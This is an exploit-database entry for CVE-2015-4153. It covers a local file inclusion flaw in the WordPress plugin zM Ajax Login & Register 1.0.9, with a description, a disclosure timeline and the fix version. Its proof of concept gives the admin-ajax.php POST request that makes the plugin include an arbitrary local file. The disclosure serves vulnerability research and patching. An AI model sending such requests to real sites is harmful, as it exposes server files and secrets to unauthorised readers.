Skip to content
cyberexploits
webappphptext

WordPress Plugin zM Ajax Login & Register 1.0.9 - Local File Inclusion

WordPress Plugin zM Ajax Login & Register 1.0.9 - Local File Inclusion

Published on 2015-06-04

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/php/webapps/37200.txt7eac4c3a
raw
# Exploit Title: CVE-2015-4153 - WordPress zM Ajax Login & Register

Plugin [Local File Inclusion]

# Date: 2015/06/01

# Exploit Author: Panagiotis Vagenas

# Contact: https://twitter.com/panVagenas

# Vendor Homepage: http://zanematthew.com/

# Software Link:

https://downloads.wordpress.org/plugin/zm-ajax-login-register.1.0.9.zip

# Version: 1.0.9

# Tested on: WordPress 4.2.2

# Category: webapps

# CVE: CVE-2015-4153



* Description



Any authenticated or non-authenticated user can perform a local file

inclusion attack by exploiting the wp_ajax_nopriv_load_template action.

Plugin simply includes the file specified in 'template' POST parameter

without any further validation.



* Proof of Concept



Send a post request to

`http://my.vulnerable.website.com/wp-admin/admin-ajax.php` with data:

`action=load_template&template=[relative path to local

file]&security=[wp nonce]&referer=[action from which the nonce came from]`



* Timeline



2015/06/01 Discovered

2015/06/01 Vendor alerted via contact form at his website

2015/06/03 Vendor responded

2015/06/03 Fixed in version 1.1.0





* Solution



Update to version 1.1.0

View on GitHub